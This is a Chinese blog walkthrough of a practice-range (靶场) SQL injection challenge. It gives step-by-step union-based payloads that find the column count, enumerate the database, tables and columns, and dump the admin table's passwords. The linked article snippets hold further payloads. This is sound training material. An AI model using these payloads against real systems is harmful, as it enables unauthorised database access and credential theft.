SQL注入--靶场练习

最新推荐文章于 2024-04-16 22:46:11 发布
最新推荐文章于 2024-04-16 22:46:11 发布
阅读量1.8k 收藏 17
点赞数 3
分类专栏: SQL注入 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wmr123456001/article/details/128974810
版权

提示:本章提到的靶场需要登录注册

靶场奉上:封神台靶场

文章目录

前言

这里我们需要用到上篇的一些知识
SQL注入基础教程

提示:打开靶场的传送门,会看到以下界面
在这里插入图片描述

一、判断注入类型

?id=1 and 1=1

在这里插入图片描述可以看到,此步正常回显
接着输入:

?id=1 and 1=2

在这里插入图片描述
开始出问题了
由此可以判断出是数字型注入

二、判断几列

?id=1 order by 2

在这里插入图片描述正常回显

?id=1 order by 3

在这里插入图片描述出现异常
说明有2列

判断显示位

这里需要输入一个不存在的id

?id=1000 union select 1,2

在这里插入图片描述回显不太明显,我第一眼看的时候都没找到
这里给大家标出来了,可以看出只显示了第二列

查询数据库名

?id=1000 union select 1,database()

在这里插入图片描述数据库名为maoshe

查询表名

?id=1000 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'

在这里插入图片描述这里大概可以猜测出在admin表中

查询列名

?id=1000 union select 1,group_concat(column_name) from information_schema.columns where table_schema='maoshe' and table_name='admin'

在这里插入图片描述所以三列分别是id, username, password

爆表

?id=1000 union select 1,group_concat(password) from admin

在这里插入图片描述这里爆出了2个密码,根据题意,我们应该获取admin的密码

?id=1000 union select 1,group_concat(username) from admin

在这里插入图片描述所以是第一个密码–hellohack

拿到靶场上提交
在这里插入图片描述
在这里插入图片描述
Good Job!
注入成功!!!

结语

为了方便大家练习,小编准备下期奉上各大靶场的链接

墨然师兄
关注
  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
sql注入靶场.zip
06-24
sqli-labs-master,在github下载不了的可以在这下载
SQL注入的相关例题(ctfhub)
2401_82388450的博客
04-01 744
例题。
sql注入靶场
weixin_45095113的博客
11-27 265
SQL注入靶场
靶场实践之SQL注入
Stephen8848的博客
08-14 361
渗透测试的时候使用工具是很简单的,但是要是对技术有追求,还是需要了解得更深入一些,多探索!安装系统自行百度,这里不做过多说明。版本5之后,数据库里有一个默认的库。它里面有三个关键的表,分别是。
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 2261
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
sql注入——pikachu靶场
cjh12340826的博客
07-20 616
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7392
sqli-labs,sql注入,burpsuit
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 1245
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-labs靶场通关技巧(1-20)
ldzhhh的博客
07-26 2160
Less1 注入步骤: 在参数后面加上单引号,数据库报错,说明存在注入 id=1' and 1=1--+,返回正常 id=1' and 1=2--+,返回数据为空,说明这是个基于单引号的字符型注入 用二分法逐步判断字段数,此处有3个字段:id=1' order by 3--+ 确定回显点:id=-1' union select 1,2,3--+(参数1改成数据库不存在的值,如0或者负数) 暴库payload: id=-1' union select 1,2,dat.
sql-labs靶场环境搭建
ljlrookiebird的博客
03-29 2734
有可能mysql无法打开,应该是和你本地的mysql冲突了,找到命令提示符界面右键使用管理员打开后,输入命令:sc delete mysql,删除你本地的mysql,记住用管理员打开,否则可能没有权限导致无法删除,删除后即可在phpstudy面板正常启动mysql服务。最近突然想对网安知识进行复习,然后就想起之前做过的sql-labs靶场,这个靶场对于我们学习sql注入的知识还是比较有帮助的,接下来我就记录下我的闯关过程吧,本文章一共分为环境搭建和闯关两部分。初始化完成后就可以愉快的开始闯关了。
sql-lap注入靶场
最新发布
05-02
sql注入练习靶场,实现注入漏洞复现,让你也当一回黑客。安装方法可以自己上网找哦。 使用方法:通过猜解,判断实现密码破解
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL注入练习.rar
06-25
sql-labs,该环境可以用来练习sql注入。是闯关类型的一个靶场环境,从易到难,从简到繁。将每一关都闯过的话,对于sql注入的理解会比较深入。
sql注入靶场练习
weixin_46976845的博客
03-19 5842
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1185
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL靶场练习总结
weixin_51884452的博客
11-08 601
sql注入总结
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的https://github.com/Audi-1/sqli-labs下载sqli-labs项目。 2. 安装Web服务器:您需要在本地或者服务器上安装一个Web服务器,例如Apache或Nginx。 3. 将sqli-labs项目放置在Web服务器的根目录下:将下载的sqli-labs项目解压,并将解压后的文件夹放置在Web服务器的根目录下。 4. 配置数据库sqli-labs使用MySQL数据库作为后端数据库。您需要创建一个新的数据库,并将数据库的连接信息配置到sqli-labs项目的配置文件中。 5. 导入数据库表结构:在MySQL数据库中,导入sqli-labs项目提供的SQL文件,以创建所需的表结构和数据。 6. 启动Web服务器:启动您的Web服务器,并确保sqli-labs项目可以通过浏览器访问。 7. 访问sqli-labs靶场:在浏览器中输入您的Web服务器地址,加上sqli-labs项目的路径,即可访问sqli-labs靶场。 请注意,搭建sqli-labs靶场需要一定的技术基础和安全意识。在进行任何实验之前,请确保您已经了解了SQL注入的风险,并采取适当的安全措施,以避免对系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值